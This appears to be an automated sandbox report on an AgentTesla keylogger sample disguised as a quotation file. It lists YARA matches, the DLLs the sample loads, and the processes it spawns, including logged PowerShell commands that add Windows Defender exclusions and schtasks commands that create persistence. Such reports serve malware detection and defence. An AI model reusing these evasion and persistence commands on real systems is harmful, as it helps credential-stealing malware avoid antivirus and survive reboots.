                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: rQuotation3200025006.exe, MainMenu.csLarge array initialization: : array initializer size 590396
                    Source: initial sampleStatic PE information: Filename: rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1731067314.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1738225361.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000000.1676301194.0000000000290000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBWmX.exeD vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1739676085.0000000007710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBWmX.exeD vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.0000000003924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732045998.0000000002701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000008.00000002.4157176054.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exeBinary or memory string: OriginalFilenameBWmX.exeD vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: rQuotation3200025006.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: pBBqGOzrz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, SIQfwITd9ei2CpANlp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@39/20@2/2
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: \Sessions\1\BaseNamedObjects\dUNTqlHSZjNOL
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File created: C:\Users\user\AppData\Local\Temp\tmp3D2.tmp
                    Source: rQuotation3200025006.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: rQuotation3200025006.exe ReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File read: C:\Users\user\Desktop\rQuotation3200025006.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Process created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Process created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
